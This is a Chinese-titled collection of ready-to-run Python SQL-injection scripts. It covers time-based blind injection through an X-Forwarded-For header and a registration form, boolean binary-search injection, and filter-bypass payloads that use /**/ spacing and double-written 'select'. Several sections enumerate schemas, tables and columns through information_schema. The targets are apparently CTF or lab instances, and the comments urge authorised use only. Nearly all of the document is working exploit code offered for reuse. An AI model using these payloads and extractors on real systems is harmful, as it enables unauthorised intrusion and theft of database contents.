sql注入常用脚本


    XFF时间盲注二分法

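    import requests

    # Time-based blind SQL injection through the X-Forwarded-For header: the
    # endpoint stores the "client IP" it reads from XFF in an INSERT without
    # escaping it, so a quote in the header breaks out of the string.  Each
    # probe evaluates a CASE on one character of the target string and sleeps
    # when the condition holds; a ReadTimeout is the "true" answer of the
    # oracle.  The host below is a lab/CTF instance -- only run this against
    # targets you are authorised to test.
    url = "http://49.235.141.207:25501/test_sql/sql_ip_insert/"

    SLEEP_SECONDS = 3
    # Read timeout of the oracle.  Keep it at or below the sleep: a genuine
    # response slower than TIMEOUT is a false positive, a sleep shorter than
    # TIMEOUT a false negative.  3/3 is what the original used; widen the gap
    # (e.g. sleep 5, timeout 3) on a noisy link.
    TIMEOUT = SLEEP_SECONDS
    RETRIES = 3              # probes re-sent on a network error before giving up
    MAX_LEN = 49             # the original read positions 1..49
    LOW, HIGH = 32, 127      # search window; 32 doubles as the "nothing here" sentinel

    # {op} is ">" while narrowing and "=" for the final check, {pos} the 1-based
    # character index, {value} the ASCII value under test.  The extracted query
    # is `select flag from flag`; change it to read something else.
    TEMPLATE = (
        "127.0.0.1' and (case when ascii(substr((select flag from flag) from {pos} for 1))"
        "{op}{value} then sleep({sleep}) else 0 end) and '1"
    )


    def _sleeps(payload, retries=RETRIES):
        """Send one probe in X-Forwarded-For and return True iff the server stalled.

        A ReadTimeout means sleep() ran, i.e. the condition was true.  Any other
        request error is retried up to ``retries`` times and then raised; the
        original swallowed it and re-sent the same probe forever, which hangs the
        script on a dead host or a dropped connection.
        """
        last_error = None
        for _ in range(retries):
            try:
                requests.get(url, headers={"X-Forwarded-For": payload}, timeout=TIMEOUT)
            except requests.exceptions.ReadTimeout:
                return True
            except requests.exceptions.RequestException as exc:
                last_error = exc
            else:
                return False
        raise RuntimeError(f"probe failed {retries} times: {last_error}") from last_error


    def _char_at(pos, probe=_sleeps):
        """Recover the character at 1-based ``pos`` by binary search.

        Only ">" comparisons are used while narrowing (about 7 probes), then one
        "=" probe confirms the candidate.  Returns "" when nothing in (LOW, HIGH]
        matches -- that is how the end of the string (ascii('') is 0) and
        non-ASCII bytes (ascii() >= 128) are recognised.  The original sent both
        an "=" and a ">" probe on every step, roughly twice the traffic.
        """
        lo, hi = LOW, HIGH
        while lo < hi:
            mid = (lo + hi) // 2
            print(pos, mid)
            if probe(TEMPLATE.format(op=">", pos=pos, value=mid, sleep=SLEEP_SECONDS)):
                lo = mid + 1          # code > mid
            else:
                hi = mid              # code <= mid (or out of window)
        # Out-of-window values also collapse the search onto a bound, so the
        # survivor has to be confirmed before it is accepted.
        if lo > LOW and probe(TEMPLATE.format(op="=", pos=pos, value=lo, sleep=SLEEP_SECONDS)):
            return chr(lo)
        return ""


    def extract(max_len=MAX_LEN, probe=_sleeps):
        """Read the target string left to right, stopping at the first empty position."""
        recovered = ""
        for pos in range(1, max_len + 1):
            ch = _char_at(pos, probe)
            if not ch:
                break
            recovered += ch
            print(recovered)
        return recovered


    if __name__ == "__main__":
        flag = extract()
        print(flag)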

    二分法时间盲注

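    import requests

    # Time-based blind SQL injection through the username field of a
    # registration form.  The payload closes the string, evaluates a CASE on one
    # character of the target and sleeps when it matches; a ReadTimeout is the
    # "true" answer of the oracle.  Every probe is a real POST to register.php,
    # so presumably each one inserts (or tries to insert) a row -- expect
    # side effects on the target.  Lab/CTF host -- only run against targets you
    # are authorised to test.
    url = "http://e2237b8f-0ea4-4294-bbe7-007af8f88f8b.node3.buuoj.cn/register.php"

    # Traffic is routed through an intercepting proxy (Burp default).  Two
    # consequences: the proxy's own latency counts against TIMEOUT, and if the
    # proxy is not listening every probe raises a ProxyError -- the original
    # swallowed that and looped on the same probe forever.  Set to None to go
    # direct.
    proxies = {"http": "127.0.0.1:8080"}

    SLEEP_SECONDS = 3
    # Keep the read timeout at or below the sleep (see the trade-off: slower
    # legit responses are false positives, a shorter sleep false negatives).
    TIMEOUT = SLEEP_SECONDS
    RETRIES = 3
    MAX_LEN = 49
    LOW, HIGH = 32, 127      # search window; 32 doubles as the "nothing here" sentinel

    # {op} is ">" while narrowing and "=" for the final check.  `||` is string
    # concatenation or OR depending on sql_mode; the CASE is evaluated either way.
    TEMPLATE = (
        "aaaaa' || (case when ascii(substr((select*from flag) from {pos} for 1))"
        "{op}{value} then sleep({sleep}) else 0 end) || 'aaa"
    )


    def _sleeps(username, retries=RETRIES):
        """POST one registration with ``username`` as payload; True iff the server stalled.

        ReadTimeout => sleep() ran => condition true.  Other request errors are
        retried ``retries`` times and then raised instead of being ignored.
        """
        form = {"email": "basb@qq.com", "username": username, "password": "1234"}
        last_error = None
        for _ in range(retries):
            try:
                requests.post(url, data=form, timeout=TIMEOUT, proxies=proxies)
            except requests.exceptions.ReadTimeout:
                return True
            except requests.exceptions.RequestException as exc:
                last_error = exc
            else:
                return False
        raise RuntimeError(f"probe failed {retries} times: {last_error}") from last_error


    def _char_at(pos, probe=_sleeps):
        """Binary-search the character at 1-based ``pos``; "" when none matches.

        ">" probes narrow the window (about 7 requests), one "=" probe confirms
        the survivor.  An empty result marks the end of the string (ascii('') is
        0) or a byte outside the window (>= 128).  The original sent an "=" and
        a ">" probe on every step.
        """
        lo, hi = LOW, HIGH
        while lo < hi:
            mid = (lo + hi) // 2
            print(pos, mid)
            if probe(TEMPLATE.format(op=">", pos=pos, value=mid, sleep=SLEEP_SECONDS)):
                lo = mid + 1
            else:
                hi = mid
        # Values outside the window also collapse the search onto a bound,
        # hence the confirmation probe.
        if lo > LOW and probe(TEMPLATE.format(op="=", pos=pos, value=lo, sleep=SLEEP_SECONDS)):
            return chr(lo)
        return ""


    def extract(max_len=MAX_LEN, probe=_sleeps):
        """Read the target string left to right until a position yields nothing."""
        recovered = ""
        for pos in range(1, max_len + 1):
            ch = _char_at(pos, probe)
            if not ch:
                break
            recovered += ch
            print(recovered)
        return recovered


    if __name__ == "__main__":
        flag = extract()
        print(flag)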

    二分法盲注

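    import requests

    # Boolean-based blind SQL injection through ?id=.  The injected expression is
    # if(<cond>,1,0): id=1 renders a page containing "glzjin", id=0 renders a
    # page containing "Error", so the two markers are the oracle.  Spaces are
    # avoided entirely (select(flag)from(flag)), which is what the target's
    # filter appears to require.  Lab/CTF host -- only run against targets you
    # are authorised to test.
    url = "http://116.63.149.36:50048/file_id.php?id="

    TRUE_MARK = "glzjin"
    FALSE_MARK = "Error"
    TIMEOUT = 10             # the original sent requests without any timeout
    MAX_LEN = 49
    LOW, HIGH = 32, 127      # search window; 32 doubles as the "nothing here" sentinel

    # {op} is ">" while narrowing and "=" for the final check.
    TEMPLATE = "if(ascii(substr((select(flag)from(flag)),{pos},1)){op}{value},1,0)"


    def _is_true(payload):
        """Return the oracle's answer for one condition.

        The original POSTed to the URL with the condition in the query string
        and no body, so that is kept.  A page with neither marker (WAF block,
        5xx, rate limit) raises instead of being ignored: the original left the
        search bounds untouched in that case and re-sent the same probe forever.
        """
        page = requests.post(url + payload, timeout=TIMEOUT).text
        if TRUE_MARK in page:
            return True
        if FALSE_MARK in page:
            return False
        raise RuntimeError(f"no oracle marker in response for: {payload}")


    def _char_at(pos, probe=_is_true):
        """Binary-search the character at 1-based ``pos``; "" when none matches.

        ">" probes narrow the window (about 7 requests), one "=" probe confirms
        the survivor.  An empty result marks the end of the string (ascii('') is
        0) or a byte outside the window (>= 128).  The original issued an "="
        and a ">" request on every step.
        """
        lo, hi = LOW, HIGH
        while lo < hi:
            mid = (lo + hi) // 2
            print(pos, mid)
            if probe(TEMPLATE.format(op=">", pos=pos, value=mid)):
                lo = mid + 1
            else:
                hi = mid
        # Values outside the window also collapse the search onto a bound,
        # hence the confirmation probe.
        if lo > LOW and probe(TEMPLATE.format(op="=", pos=pos, value=lo)):
            return chr(lo)
        return ""


    def extract(max_len=MAX_LEN, probe=_is_true):
        """Read the target string left to right until a position yields nothing."""
        recovered = ""
        for pos in range(1, max_len + 1):
            ch = _char_at(pos, probe)
            if not ch:
                break
            recovered += ch
            print(recovered)
        return recovered


    if __name__ == "__main__":
        flag = extract()
        print(flag)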

    时间盲注

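    import requests

    # Time-based blind SQL injection against a keyword/space filter.  Spaces are
    # written as inline comments (/**/) and "select" as "selselectect" or
    # "seselectlect": the filter removes the keyword once and what is left
    # reassembles to "select" (double-write bypass).  The base URL ends in a
    # single quote so that the quoted id value is closed and an AND clause can
    # follow; the original's URL literal ended in id=1'' with an unbalanced
    # quote, which does not even parse -- the trailing quote is kept as part of
    # the URL here since every payload assumes a closed string.  Lab host --
    # only run against targets you are authorised to test.
    url = "http://139.199.182.61/index.php?id=1'"

    SLEEP_SECONDS = 3
    TIMEOUT = SLEEP_SECONDS     # keep <= sleep; widen the gap on a noisy link
    RETRIES = 3
    CHARSET = range(33, 127)    # printable ASCII; linear "=" scan, since ">" may be filtered too
    MAX_LEN = 49
    MAX_ROWS = 10

    # Values already recovered in earlier runs.  The stages that produced them
    # were commented out in the original so re-runs could skip straight to the
    # data dump; they are real functions below, call them to recompute.
    lendata = 7
    databases = ['easysql']
    tables = ['f1aggggggggggggg']
    columns = ['fl4444444g']

    # One template per stage.  {row} is the LIMIT offset, {pos} the 1-based
    # character index, {code} the ASCII value under test; the query sleeps when
    # the character matches.  The column stage originally had a bare space
    # before "limit" -- the only one in the file -- which a space filter would
    # reject; it is written as /**/ here like every other separator.
    LENGTH_TMPL = "/**/and/**/if(length(database())={length},sleep({sleep}),1)#"
    DBNAME_TMPL = "/**/and/**/if(ascii(substr(database(),{pos},1))={code},sleep({sleep}),1)#"
    SCHEMA_TMPL = (
        "/**/and/**/if(ascii(substr((selselectect/**/schema_name/**/from/**/"
        "information_schema.schemata/**/limit/**/{row},1),{pos},1))={code},sleep({sleep}),1)#"
    )
    TABLE_TMPL = (
        "/**/and/**/if(ascii(substr((selselectect/**/table_name/**/from/**/"
        "information_schema.tables/**/where/**/table_schema=database()"
        "/**/limit/**/{row},1),{pos},1))={code},sleep({sleep}),1)#"
    )
    COLUMN_TMPL = (
        "/**/and/**/if(ascii(substr((seselectlect/**/column_name/**/from/**/"
        "information_schema.columns/**/where/**/table_schema=database()/**/and/**/"
        'table_name="{table}"/**/limit/**/{row},1),{pos},1))={code},sleep({sleep}),1)#'
    )
    DATA_TMPL = (
        "/**/and/**/if(ascii(substring((seselectlect/**/{column}/**/from/**/{db}.{table}"
        "/**/limit/**/{row},1),{pos},1))={code},sleep({sleep}),1)#"
    )


    def _sleeps(payload, retries=RETRIES):
        """GET url+payload; True iff the read timed out (sleep() ran).

        Other request errors are retried ``retries`` times and then raised; the
        original swallowed them and moved on to the next character code, which
        silently corrupts the result when the host is flaky.
        """
        last_error = None
        for _ in range(retries):
            try:
                requests.get(url + payload, timeout=TIMEOUT)
            except requests.exceptions.ReadTimeout:
                return True
            except requests.exceptions.RequestException as exc:
                last_error = exc
            else:
                return False
        raise RuntimeError(f"probe failed {retries} times: {last_error}") from last_error


    def _dump_string(template, probe=_sleeps, max_len=MAX_LEN, **fields):
        """Recover one string with a linear scan of CHARSET per position.

        ``fields`` fills the template's extra placeholders ({row}, {table}, ...).
        A position where no code matches ends the string (ascii('') is 0, below
        CHARSET); a character outside CHARSET therefore truncates the result.
        """
        recovered = ""
        for pos in range(1, max_len + 1):
            for code in CHARSET:
                payload = template.format(sleep=SLEEP_SECONDS, pos=pos, code=code, **fields)
                print(payload)
                if probe(payload):
                    recovered += chr(code)
                    print(recovered)
                    break
            else:
                break
        return recovered


    def _dump_rows(template, max_rows=MAX_ROWS, probe=_sleeps, **fields):
        """Walk LIMIT {row},1 for row = 0.. and collect values until an empty one.

        The original never reset its accumulator between rows, so the second
        name was appended to the first; each row starts from "" here.
        """
        rows = []
        for row in range(max_rows):
            value = _dump_string(template, probe, row=row, **fields)
            if not value:
                break
            rows.append(value)
        return rows


    def database_length(max_len=MAX_LEN, probe=_sleeps):
        """Return length(database()), or 0 if no value in 1..max_len matched."""
        for length in range(1, max_len + 1):
            if probe(LENGTH_TMPL.format(sleep=SLEEP_SECONDS, length=length)):
                print("database length:", length)
                return length
        return 0


    def database_name(probe=_sleeps):
        """Return database() character by character."""
        return _dump_string(DBNAME_TMPL, probe)


    def schema_names(probe=_sleeps):
        """Return the schema names from information_schema.schemata."""
        return _dump_rows(SCHEMA_TMPL, probe=probe)


    def table_names(probe=_sleeps):
        """Return the table names of the current schema."""
        return _dump_rows(TABLE_TMPL, probe=probe)


    def column_names(table, probe=_sleeps):
        """Return the column names of ``table`` in the current schema."""
        return _dump_rows(COLUMN_TMPL, probe=probe, table=table)


    def dump_column(db, table, column, probe=_sleeps):
        """Return the values of ``db.table.column``, one per LIMIT offset."""
        return _dump_rows(DATA_TMPL, probe=probe, db=db, table=table, column=column)


    if __name__ == "__main__":
        # Final stage over the values hard-coded above (the only stage the
        # original's lists are useful for).
        for db in databases:
            for tbl in tables:
                for col in columns:
                    print(db, tbl, col, dump_column(db, tbl, col))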

    其他

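    import requests

    # Two boolean-based blind SQLi helpers against two different targets.  Both
    # use a page marker as the oracle (a string present only when the injected
    # condition is true) and recover strings one character at a time with a
    # linear scan of the charset.  Spaces are written as /**/ and the comma-free
    # substr(x from N for 1) form is used, which is what the targets' filters
    # appear to require.  Both hosts are CTF instances -- run only against
    # targets you are authorised to test.
    REQUEST_TIMEOUT = 10   # the original sent every request without a timeout


    def _dump(is_true, template, max_len, charset):
        """Recover a string through the ``is_true(payload)`` oracle.

        ``template`` takes ``(pos, code)`` via %-formatting.  For each 1-based
        position the charset is scanned until the oracle says "equal"; a position
        where nothing matches ends the string (ascii('') is 0, below every
        charset used here).  The originals kept scanning the charset after a hit
        and never stopped at the end of the string; the break and early return
        cut the request count roughly in half or better.
        """
        recovered = ""
        for pos in range(1, max_len + 1):
            print(pos)
            for code in charset:
                if is_true(template % (pos, code)):
                    recovered += chr(code)
                    print(recovered)
                    break
            else:
                break
        return recovered


    # --- target 1: marker "I asked nothing", injected as ?id=0 or <cond> ---
    s = requests.session()
    ctfshow_url = 'https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'

    # One payload per stage; the original switched between them by hand by
    # commenting lines out.  0x666C6167 is 'flag' as a hex literal, which
    # avoids quoting the table name.
    TABLE_NAMES_TMPL = (
        "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables"
        "/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"
    )
    COLUMN_NAMES_TMPL = (
        "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns"
        "/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"
    )
    FLAG_TMPL = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"


    def ctfshow_true(payload):
        """Oracle for target 1: the marker shows only when the OR clause is true."""
        page = s.get(url=ctfshow_url + '?id=0/**/or/**/' + payload, timeout=REQUEST_TIMEOUT).text
        return 'I asked nothing' in page


    # --- target 2: marker "By Rudyard Kipling"; the base URL already closes the
    #     quote (?id=-1'/**/) so each payload starts with an or / || clause ---
    url = "http://124.156.121.112:28069/?id=-1'/**/"


    def _kipling_true(full_url):
        """Oracle for target 2; prints each URL like the original did."""
        print(full_url)
        r = requests.get(full_url, timeout=REQUEST_TIMEOUT)
        return 'By Rudyard Kipling' in r.text


    def db(url, max_len=4, charset=range(32, 128)):
        """Dump database() from target 2 and return it.

        Defaults mirror the original (4 positions); it printed each matching
        character without accumulating or breaking out of the scan.
        """
        tmpl = "or/**/ascii(substr(database()/**/from/**/%s/**/for/**/1))=%s#"
        name = _dump(lambda p: _kipling_true(url + p), tmpl, max_len, charset)
        print(name)
        return name


    def table(url, max_rows=4, max_len=5, charset=range(48, 128)):
        """Dump the current schema's table names from target 2, one LIMIT/OFFSET row at a time.

        Defaults mirror the original (4 rows, 5 characters each -- raise
        ``max_len`` for longer names).  The original's ``u=id=...`` chained
        assignment shadowed the ``id`` builtin for no reason and is gone.
        """
        names = []
        for row in range(max_rows):
            tmpl = (
                "||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables"
                "/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/%d)"
                "/**/from/**/%%s/**/for/**/1))=%%s#" % row
            )
            name = _dump(lambda p: _kipling_true(url + p), tmpl, max_len, charset)
            if not name:
                break
            names.append(name)
        return names


    if __name__ == "__main__":
        # The original ran the table-name stage of target 1 at import time
        # (44 positions, codes 31..127); use COLUMN_NAMES_TMPL / FLAG_TMPL for
        # the next stages.  db()/table() were defined but never called.
        print(_dump(ctfshow_true, TABLE_NAMES_TMPL, max_len=44, charset=range(31, 128)))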